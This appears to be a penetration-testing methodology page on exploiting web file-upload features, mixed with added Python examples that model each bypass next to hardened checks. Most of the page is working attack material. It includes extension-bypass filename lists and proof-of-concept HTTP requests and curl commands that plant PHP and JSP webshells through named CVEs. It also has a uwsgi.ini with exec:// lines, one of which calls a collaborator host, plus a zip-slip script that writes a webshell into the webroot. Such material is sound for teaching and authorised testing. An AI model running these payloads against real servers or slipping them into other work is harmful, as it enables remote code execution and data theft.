File Upload

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

File Upload General Methodology

Other useful extensions:

  • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
  • Working in PHPv8: .php, .php4, .php5, .phtml_, .module_, .inc_, .hphp_, .ctp_
  • ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
  • Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
  • Coldfusion: .cfm, .cfml, .cfc, .dbm
  • Flash: .swf
  • Perl: .pl, .cgi
  • Erlang Yaws Web Server: .yaws

Bypass file extension checks

  1. If they apply, check the previous extensions. Also test them using some uppercase letters: pHp, .pHP5, .PhAr …
  2. Check adding a valid extension before the execution extension (use the previous extensions also):
  • file.png.php
  • file.png.Php5
  3. Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously mentioned extensions)
  • file.php%20
  • file.php%0a
  • file.php%00
  • file.php%0d%0a
  • file.php/
  • file.php.\
  • file.
  • file.php….
  • file.pHp5….
  4. Try to bypass the protections by tricking the server-side extension parser with techniques like doubling the extension or adding junk data (null bytes) between extensions. You can also use the previous extensions to prepare a better payload.
  • file.png.php
  • file.png.pHp5
  • file.php#.png
  • file.php%00.png
  • file.php\x00.png
  • file.php%0a.png
  • file.php%0d%0a.png
  • file.phpJunk123png
  5. Add another layer of extensions to the previous check:
  • file.png.jpg.php
  • file.php%00.png%00.jpg
  6. Try to put the exec extension before the valid extension and pray that the server is misconfigured. This is useful to exploit Apache misconfigurations where anything with the extension .php, but not necessarily ending in .php, will execute code.
  7. Using NTFS alternate data streams (ADS) in Windows. In this case, a colon character ":" is inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension is created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot after this pattern might also help to bypass further restrictions (e.g. "file.asp::$data.")
  8. Try to break the filename length limits. The valid extension gets cut off and the malicious PHP extension is what remains. AAA<--SNIP-->AAA.php
# Linux maximum 255 bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png
# Upload the file and check the response to learn how many characters it allows. Let's say 236
python3 -c 'print("A" * 232)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Make the payload
AAA<--SNIP 232 A-->AAA.php.png
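The following Python model is an added example, not code from the original page. It runs the bypass candidates listed above through a weak server-side check (a case-sensitive blacklist on whatever follows the last dot, applied to the filename as received), then through an assumed storage model (percent-decoding, C-string truncation at the first NUL, trailing dots stripped, a 236-character limit mirroring the wget behaviour described further down) and an Apache-style handler that executes any .php segment. The strict allow-list and random rename beside it are the hardened form. The limit, the storage rules and all function names are assumptions of the model.

```python
import re
import secrets
import urllib.parse

# Extensions an Apache AddHandler for php would execute, as a middle or final segment.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc", "htaccess"}
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}
MAX_STORED_LEN = 236  # assumed storage limit (models wget's truncation)


def naive_is_allowed(name: str) -> bool:
    """Weak check: case-sensitive blacklist on whatever follows the last dot,
    applied to the raw (still percent-encoded) filename."""
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    return ext not in {"php", "phtml", "phar"}


def stored_name(name: str) -> str:
    """Assumed model of what actually lands on disk: percent-decode, cut at the
    first NUL (C strings), strip trailing dots and spaces (Windows / some
    handlers), truncate to MAX_STORED_LEN."""
    name = urllib.parse.unquote(name)
    name = name.split("\x00", 1)[0]
    name = name.rstrip(". ")
    return name[:MAX_STORED_LEN]


def apache_executes(stored: str) -> bool:
    """Apache mod_mime matches every dotted segment after the basename, so
    shell.php.png runs as PHP when php is registered with AddHandler."""
    return any(seg.lower() in EXEC_EXTS for seg in stored.split(".")[1:])


def strict_is_allowed(name: str) -> bool:
    """Hardened check: decode first, reject control bytes and path separators,
    require a simple basename and an allow-listed final extension."""
    decoded = urllib.parse.unquote(name)
    if any(ord(c) < 0x20 for c in decoded) or "/" in decoded or "\\" in decoded:
        return False
    if len(decoded) > MAX_STORED_LEN:
        return False
    base, dot, ext = decoded.rpartition(".")
    if not dot or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return False
    return ext.lower() in IMAGE_EXTS


def safe_stored_name(name: str) -> str:
    """Never reuse the client's name: random basename plus the validated extension."""
    if not strict_is_allowed(name):
        raise ValueError("rejected upload name")
    ext = urllib.parse.unquote(name).rpartition(".")[2].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def evaluate(name: str) -> dict:
    """Run one candidate filename through the weak pipeline and the strict one."""
    stored = stored_name(name)
    return {
        "naive_allows": naive_is_allowed(name),
        "stored_as": stored,
        "executes": naive_is_allowed(name) and apache_executes(stored),
        "strict_allows": strict_is_allowed(name),
    }


# Constructed bypass candidates, taken from the list above.
BYPASS_CANDIDATES = [
    "shell.pHp",              # case variation defeats the lowercase blacklist
    "shell.php%00.png",       # NUL truncation after percent-decoding
    "shell.php.",             # trailing dot stripped when stored
    "shell.php.png",          # middle-extension handler
    "A" * 232 + ".php.png",   # length truncation drops the .png
]

if __name__ == "__main__":
    for candidate in BYPASS_CANDIDATES + ["shell.php", "avatar.PNG"]:
        print(candidate[:40], evaluate(candidate))
```

Every candidate in the list passes the naive check and ends up executable once stored, while none of them passes the strict check; the only name the strict check accepts is a plain image name, which is then renamed before storage.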

UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) – CVE-2024-21546

Some upload handlers trim or normalize trailing dots from the stored filename. In UniSharp's Laravel Filemanager (unisharp/laravel-filemanager) versions before 2.9.1, you can bypass the extension validation by:

  • Using a valid image MIME type and magic header (e.g., PNG's \x89PNG\r\n\x1a\n).
  • Naming the uploaded file with a PHP extension followed by a dot, e.g., shell.php.
  • The server strips the trailing dot and stores shell.php, which will execute if it lands in a web-served directory (default public storage like /storage/files/).

Minimal PoC (Burp Repeater):

POST /profile/avatar HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload"; filename="0xdf.php."
Content-Type: image/png

\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--

Then access the stored path (typical in Laravel + LFM):

GET /storage/files/0xdf.php?cmd=id

Bypass Content-Type, Magic Number, Compression & Resizing

  • Bypass Content-Type checks by setting the value of the Content-Type header to: image/png , text/plain , application/octet-stream
    • Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt
  • Bypass magic number checks by adding at the beginning of the file the bytes of a real image (to confuse the file command). Or introduce the shell inside the metadata:
    exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
    or you can also introduce the payload directly into an image:
    echo '<?php system($_REQUEST["cmd"]); ?>' >> img.png
  • If compression is applied to your image, for example by PHP libraries like PHP-GD, the previous techniques won't be useful. However, you can use the PLTE chunk technique defined here to insert text that survives compression.
  • Github with the code
  • The web page could also be resizing the image, for example with the PHP-GD functions imagecopyresized or imagecopyresampled. In that case you can use the IDAT chunk technique defined here to insert text that survives the resizing.
  • Github with the code
  • Another technique to make a payload that survives image resizing with the PHP-GD function thumbnailImage is the tEXt chunk technique defined here, which inserts text that survives the transformation.
  • Github with the code
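As an added example (not code from the page or from the linked repositories), the Python below builds a small but valid PNG whose tEXt chunk carries a PHP stub, so the file passes a magic-byte check, and then walks the chunk structure, verifying each CRC and scanning chunk bodies (IDAT decompressed) for a PHP open tag. The builder shows why a magic-byte test is worthless on its own; the scanner is the check a defender adds. Note that tEXt metadata is discarded when PHP-GD re-encodes the image, which is exactly why the PLTE/IDAT techniques linked above exist; the scanner covers those chunks too. The pixel data is a constructed solid-red image and all function names are this example's own.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """length + type + data + CRC32 over type and data, as the PNG spec requires."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png_with_text(payload: bytes, width: int = 2, height: int = 2) -> bytes:
    """A valid 8-bit RGB PNG whose tEXt chunk carries an arbitrary payload.
    Pixel data is a constructed solid-red image (filter byte 0 per scanline)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))
    text = b"Comment\x00" + payload  # keyword, NUL separator, text
    return (PNG_SIG
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"tEXt", text)
            + make_chunk(b"IDAT", zlib.compress(scanlines))
            + make_chunk(b"IEND", b""))


def iter_chunks(data: bytes):
    """Yield (type, body, crc_ok) for every chunk; raise on a bad signature."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        yield ctype, body, (zlib.crc32(ctype + body) & 0xFFFFFFFF) == crc
        pos += 12 + length
        if ctype == b"IEND":
            break


def find_php(data: bytes) -> list:
    """Chunk types whose body (IDAT decompressed as a whole) contains a PHP open tag.
    This is the content check a defender adds after the magic-byte test."""
    hits, idat = [], b""
    for ctype, body, ok in iter_chunks(data):
        if not ok:
            raise ValueError(f"bad CRC in {ctype!r}")
        if ctype == b"IDAT":
            idat += body
        elif b"<?php" in body or b"<?=" in body:
            hits.append(ctype.decode())
    if idat and (b"<?php" in zlib.decompress(idat) or b"<?=" in zlib.decompress(idat)):
        hits.append("IDAT")
    return hits


def passes_magic_check(data: bytes) -> bool:
    """The weak check most upload handlers stop at."""
    return data.startswith(PNG_SIG)


if __name__ == "__main__":
    png = build_png_with_text(b"<?php system($_GET['cmd']); ?>")
    with open("shell_in_text.png", "wb") as fh:
        fh.write(png)
    print("magic ok:", passes_magic_check(png), "php in:", find_php(png))
```

The written file opens in any image viewer; `file` reports it as PNG image data, yet `find_php` reports the tEXt chunk. Run the same scanner over the IDAT/PLTE-encoded shells from the linked repositories to see that it catches them as well, because it looks at decoded chunk bodies rather than at the header.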

Other Tricks to check

  • Find a vulnerability to rename the file already uploaded (to change the extension).
  • Find a Local File Inclusion vulnerability to execute the backdoor.
  • Possible information disclosure:
    1. Upload several times (and at the same time) the same file with the same name
    2. Upload a file with the name of a file or folder that already exists
    3. Upload a file with ".", "..", or "…" as its name. For instance, in Apache on Windows, if the application saves the uploaded files in the "/www/uploads/" directory, the "." filename will create a file called "uploads" in the "/www/" directory.
    4. Upload a file that may not be deleted easily such as "…:.jpg" in NTFS. (Windows)
    5. Upload a file in Windows with invalid characters such as |<>*?" in its name. (Windows)
    6. Upload a file in Windows using reserved (forbidden) names such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
  • Try also to upload an executable (.exe) or an .html (less suspicious) that will execute code when accidentally opened by the victim.

Special extension tricks

If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.

The .phar files are like the .jar for Java, but for PHP, and can be used like a PHP file (executing them with php, or including them inside a script…).

The .inc extension is sometimes used for PHP files that are only meant to be imported, so at some point someone could have allowed this extension to be executed.

Jetty RCE

If you can upload an XML file to a Jetty server you can get RCE because new *.xml and *.war files are automatically processed. So, as shown in the following image, upload the XML file to $JETTY_BASE/webapps/ and expect a shell!

https://twitter.com/ptswarm/status/1555184661751648256/photo/1

uWSGI RCE

For a detailed examination of this vulnerability check the original research: uWSGI RCE Exploitation.

Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the ability to modify the .ini configuration file. uWSGI configuration files use a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, used as @(filename), is designed to include the contents of a file. Among the various schemes supported by uWSGI, the "exec" scheme is particularly potent, allowing data to be read from a process's standard output. This feature can be abused for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is processed.

Consider the following example of a harmful uwsgi.ini file, showcasing various schemes:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

The payload executes while the configuration file is parsed. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals once it detects changes.

It is crucial to understand how lax uWSGI's configuration file parsing is. Specifically, the payload discussed above can be embedded in a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
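Because the placeholder syntax is recognised wherever it appears in the bytes, a defender can look for it in the same way. The Python below is an added example (not from the page or from uWSGI) that scans arbitrary upload bytes for the placeholder schemes listed in the .ini above and for a [uwsgi] section, so that a PDF or image carrying `@(exec://…)` is flagged before it can ever be pointed at by a uWSGI process. The sample PDF and INI bytes are constructed for the example; the function names are this example's own.

```python
import re

# Placeholder schemes from the uwsgi.ini example above; exec and call run code.
UWSGI_PLACEHOLDER = re.compile(rb"@\((exec|call|sym|fd|http|data)://([^)\r\n]*)\)")
UWSGI_SECTION = re.compile(rb"^\s*\[uwsgi\]\s*$", re.M)


def find_uwsgi_payloads(data: bytes) -> list:
    """Return (scheme, argument) for every uWSGI placeholder in the bytes,
    regardless of the container file type."""
    return [(m.group(1).decode(), m.group(2).decode(errors="replace"))
            for m in UWSGI_PLACEHOLDER.finditer(data)]


def is_suspicious_upload(data: bytes) -> bool:
    """Flag files that carry a [uwsgi] section header or any exec/call placeholder.
    sym/fd/http/data alone are reported by find_uwsgi_payloads but not blocked here."""
    hits = find_uwsgi_payloads(data)
    return bool(UWSGI_SECTION.search(data)) or any(s in ("exec", "call") for s, _ in hits)


# Constructed sample: a PDF header with an embedded uWSGI section, as the text describes.
SAMPLE_PDF = (b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj<<>>endobj\n"
              b"[uwsgi]\nbody = @(exec://id)\n%%EOF\n")

# Constructed sample mirroring three lines of the .ini above.
SAMPLE_INI = (b"[uwsgi]\nfoo = @(sym://uwsgi_funny_function)\n"
              b"body = @(exec://whoami)\ncharacters = @(call://uwsgi_func)\n")

if __name__ == "__main__":
    for name, blob in (("pdf", SAMPLE_PDF), ("ini", SAMPLE_INI)):
        print(name, is_suspicious_upload(blob), find_uwsgi_payloads(blob))
```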

Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)

An unauthenticated endpoint in Gibbon LMS allows arbitrary file write inside the web root, leading to pre-auth RCE by dropping a PHP file. Affected versions: up to and including 25.0.01.

  • Endpoint: /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
  • Method: POST
  • Required params:
    • img: data-URI-like string: [mime];[name],[base64] (the server ignores type/name and base64-decodes the last part)
    • path: destination filename relative to the Gibbon install dir (e.g., poc.php or 0xdf.php)
    • gibbonPersonID: any non-empty value is accepted (e.g., 0000000001)

Minimal PoC to write a file and read it back:

# Prepare test payload
printf '0xdf was here!' | base64
# => MHhkZiB3YXMgaGVyZSEK

# Write poc.php via unauth POST
curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;test,MHhkZiB3YXMgaGVyZSEK&path=poc.php&gibbonPersonID=0000000001'

# Verify write
curl http://target/Gibbon-LMS/poc.php

Drop a minimal webshell and execute commands:

# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==

curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
-d 'img=image/png;foo,PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==&path=shell.php&gibbonPersonID=0000000001'

curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'

Notes:

  • The handler performs base64_decode($_POST["img"]) after splitting by ; and ,, then writes the bytes to $absolutePath . '/' . $_POST['path'] without validating extension/type.
  • The code executes as the web service user (e.g., XAMPP Apache on Windows).

References for this bug include the usd HeroLab advisory and the NVD entry. Check the References section below.

wget File Upload/SSRF Trick

Sometimes you may find that a server is using wget to download files and you can indicate the URL. In these cases, the code may be checking that the extension of the downloaded file is in a whitelist to ensure that only allowed files are downloaded. However, this check can be bypassed.

The maximum length of a filename in Linux is 255, however, wget truncates filenames to 236 characters. You can download a file called "A"*232+".php"+".gif"; this filename will bypass the check (as in this example ".gif" is a valid extension) but wget will rename the file to "A"*232+".php".

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Note that another option you may be thinking of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL passes the check and wget then downloads the redirected file with its new name. This won't work unless wget is being used with the parameter --trust-server-names, because otherwise wget saves the redirected page under the name of the file indicated in the original URL.

Escaping the upload directory via NTFS junctions (Windows)

(For this attack you need local access to the Windows machine.) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server-side code.

Example flow to redirect uploads into XAMPP webroot:

:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
::    Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882

:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
::    Minimal PHP webshell for testing
::    <?php echo shell_exec($_REQUEST['cmd']); ?>

:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"

Notes

  • mklink /J creates an NTFS directory junction (reparse point). The web server account must follow the junction and have write permission on the destination.
  • This redirects any file write; if the destination executes scripts (PHP/ASP), it becomes RCE.
  • Defenses: don't let writable upload roots be attacker-controllable under C:\Windows\Tasks or similar; prevent junction creation; validate extensions server-side; store uploads on a separate volume or with deny-execute ACLs.

GZIP-compressed body upload + path traversal in destination param → JSP webshell RCE (Tomcat)

Some upload/ingest handlers write the raw request body to a filesystem path built from user-controlled query parameters. If the handler also supports Content-Encoding: gzip and fails to canonicalize/validate the destination path, you can combine directory traversal with a gzipped payload to write arbitrary bytes into a web-served directory and get RCE (for example, dropping a JSP under Tomcat's webapps).

Generic exploitation flow:

  • Prepare your server-side payload (e.g., a minimal JSP webshell) and gzip-compress the bytes.
  • Send a POST where the path parameter (e.g., token) contains traversal that escapes the intended folder, and file indicates the filename to store. Set Content-Type: application/octet-stream and Content-Encoding: gzip; the body is the compressed payload.
  • Browse to the dropped file to trigger execution.

Illustrative request:

POST /fileupload?token=..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F&file=shell.jsp HTTP/1.1
Host: target
Content-Type: application/octet-stream
Content-Encoding: gzip
Content-Length: <len>

<gzip-compressed-bytes-of-your-jsp>

Then trigger it:

GET /jsp/shell.jsp?cmd=id HTTP/1.1
Host: target

Notes

  • Target paths vary by install (e.g., /opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/ in some stacks). Any web-exposed folder that executes JSP will do.
  • Burp Suite's Hackvertor extension can generate a correct gzip body from your payload.
  • This is a clean pre-auth arbitrary file write → RCE pattern; it does not rely on multipart parsing.

Mitigations

  • Determine upload destinations server-side; never trust client-supplied path fragments.
  • Canonicalize the path and enforce that the resolved path stays within the configured base directory.
  • Store uploads on a non-executable volume and disable script execution from writable paths.
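The added Python below (not code from the page or from any of the products mentioned) models the flawed handler and the mitigations listed above side by side: the vulnerable version joins the decoded token and file name under the upload root and lets the kernel resolve the `..` components, while the hardened version canonicalizes first and refuses anything that does not remain under the root, then inflates the gzip body only after the destination has been accepted. The same containment check applies to the Gibbon `path` parameter described earlier. The upload root, the JSP stub and all names are assumptions of the example; the traversal token is the one from the illustrative request.

```python
import gzip
import posixpath
import urllib.parse
from typing import Optional, Tuple

UPLOAD_ROOT = "/opt/app/uploads"  # assumed upload directory for the model


def vulnerable_destination(token: str, file: str) -> str:
    """Mirrors the flawed handler: decode the client-supplied directory and
    file name and join them under the upload root without any containment test.
    open() hands the joined string to the kernel, which resolves the '..'."""
    joined = posixpath.join(UPLOAD_ROOT, urllib.parse.unquote(token), file)
    return posixpath.normpath(joined)  # what the kernel would end up opening


def safe_destination(token: str, file: str) -> str:
    """Canonicalize, then require the result to stay inside UPLOAD_ROOT.
    Absolute paths, NUL bytes and traversal all fail the containment test."""
    token = urllib.parse.unquote(token)
    if "\x00" in token or "\x00" in file:
        raise ValueError("NUL byte in path")
    if "/" in file or "\\" in file:
        raise ValueError("file name must not contain separators")
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, token, file))
    if not candidate.startswith(UPLOAD_ROOT + "/"):
        raise ValueError(f"destination {candidate!r} escapes the upload root")
    return candidate


def is_contained(token: str, file: str) -> bool:
    """True when safe_destination accepts the pair, False when it rejects it."""
    try:
        safe_destination(token, file)
        return True
    except ValueError:
        return False


def decode_body(body: bytes, content_encoding: Optional[str]) -> bytes:
    """Inflate a gzip-encoded request body; the server stores the decoded bytes,
    so the path check must run on the destination, not on the body."""
    if content_encoding and content_encoding.lower() == "gzip":
        return gzip.decompress(body)
    return body


def handle_upload(token: str, file: str, body: bytes,
                  content_encoding: Optional[str] = None) -> Tuple[str, bytes]:
    """Hardened handler: validate the destination before touching the body,
    and return (destination, bytes) it would write."""
    dest = safe_destination(token, file)
    return dest, decode_body(body, content_encoding)


# Constructed request pieces mirroring the illustrative request above.
TRAVERSAL_TOKEN = "..%2f..%2f..%2f..%2fopt%2ftomcat%2fwebapps%2fROOT%2Fjsp%2F"
JSP_SHELL = b'<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
GZIPPED_SHELL = gzip.compress(JSP_SHELL)

if __name__ == "__main__":
    print("vulnerable handler writes to:", vulnerable_destination(TRAVERSAL_TOKEN, "shell.jsp"))
    try:
        handle_upload(TRAVERSAL_TOKEN, "shell.jsp", GZIPPED_SHELL, "gzip")
    except ValueError as err:
        print("hardened handler:", err)
    print(handle_upload("user42", "report.pdf", gzip.compress(b"%PDF-1.4"), "gzip"))
```

The vulnerable join resolves the request's token to /opt/tomcat/webapps/ROOT/jsp/shell.jsp even though the handler "only" writes under its upload root; the hardened join rejects that token, an absolute file name and a shorter `..%2f..` alike, and accepts a plain per-user path. Extension allow-listing (shown earlier on this page) is a separate, complementary control.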

Tools

  • Upload Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

Corrupting upload indices with snprintf quirks (historical)

Some legacy upload handlers that use snprintf() or similar to build multi-file arrays from a single-file upload can be tricked into forging the _FILES structure. Due to inconsistencies and truncation in snprintf() behaviour, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this "index corruption" pattern occasionally resurfaces in CTFs and legacy code bases.

From File upload to other vulnerabilities

Here’s a top 10 list of things that you can achieve by uploading (from here):

  1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
  2. SVG: Stored XSS / SSRF / XXE
  3. GIF: Stored XSS / SSRF
  4. CSV: CSV injection
  5. XML: XXE
  6. AVI: LFI / SSRF
  7. HTML / JS : HTML injection / XSS / Open redirect
  8. PNG / JPEG: Pixel flood attack (DoS)
  9. ZIP: RCE via LFI / DoS
  10. PDF / PPTX: SSRF / BLIND XXE

Burp Extension

GitHub - PortSwigger/upload-scanner: HTTP file upload scanner for Burp Proxy

Magic Header Bytes

  • PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\0\x03["
  • JPG: "\xff\xd8\xff"

Refer to https://en.wikipedia.org/wiki/List_of_file_signatures for other filetypes.

Zip/Tar File Automatically decompressed Upload

If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:

Upload an archive containing soft links to other files; when you access the decompressed files you will reach the linked files:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Decompress in different folders

The unexpected creation of files in other directories during decompression is a significant issue. Despite the initial assumption that this setup guards against OS-level command execution through malicious file uploads, the hierarchical compression support and directory traversal capabilities of the ZIP archive format can be exploited. This allows attackers to bypass restrictions and escape secure upload directories by manipulating the decompression functionality of the targeted application.

An automated exploit for crafting such files is available at evilarc on GitHub. The utility can be used as follows:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Additionally, the symlink trick with evilarc is an option. If the objective is to target a file like /flag.txt, a symlink to that file should be created on your system first. This ensures that evilarc does not run into errors during its operation.

Below is an example of Python code used to create a malicious zip file:

#!/usr/bin/env python3
import zipfile
from io import BytesIO


def create_zip():
    f = BytesIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    # Entry name carrying traversal: a naive extractor writes it into the webroot
    z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
    z.writestr('otherfile.xml', 'Content of the file')
    z.close()
